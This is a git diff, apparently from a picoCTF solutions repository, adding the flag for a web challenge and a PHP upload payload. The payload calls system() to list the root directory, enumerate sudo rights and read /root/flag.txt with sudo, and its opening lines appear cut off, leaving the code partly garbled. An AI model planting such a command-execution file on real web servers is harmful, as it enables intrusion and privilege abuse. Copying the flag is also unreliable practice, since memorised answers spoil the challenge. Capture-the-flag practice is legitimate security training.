diff --git a/web/n0s4n1ty_1/flag.txt b/web/n0s4n1ty_1/flag.txt
new file mode 100644
index 0000000..073da0a
--- /dev/null
+++ b/web/n0s4n1ty_1/flag.txt
@@ -0,0 +1 @@
+picoCTF{wh47_c4n_u_d0_wPHP_5fd11be6}
diff --git a/web/n0s4n1ty_1/payload.php b/web/n0s4n1ty_1/payload.php
new file mode 100644
index 0000000..07730ec
--- /dev/null
+++ b/web/n0s4n1ty_1/payload.php
@@ -0,0 +1,17 @@
+";
+ echo nl2br(system('ls -lah /'));
+ echo "
";
+
+ echo "sudo rights:
";
+ echo nl2br(system('sudo -l'));
+ echo "
";
+
+ echo "'/root' listing:
";
+ echo nl2br(system('sudo ls -lah /root'));
+ echo "
";
+
+ echo "'/root/flag.txt' contents:
";
+ echo nl2br(system('sudo cat /root/flag.txt'));
+ echo "
";
+?>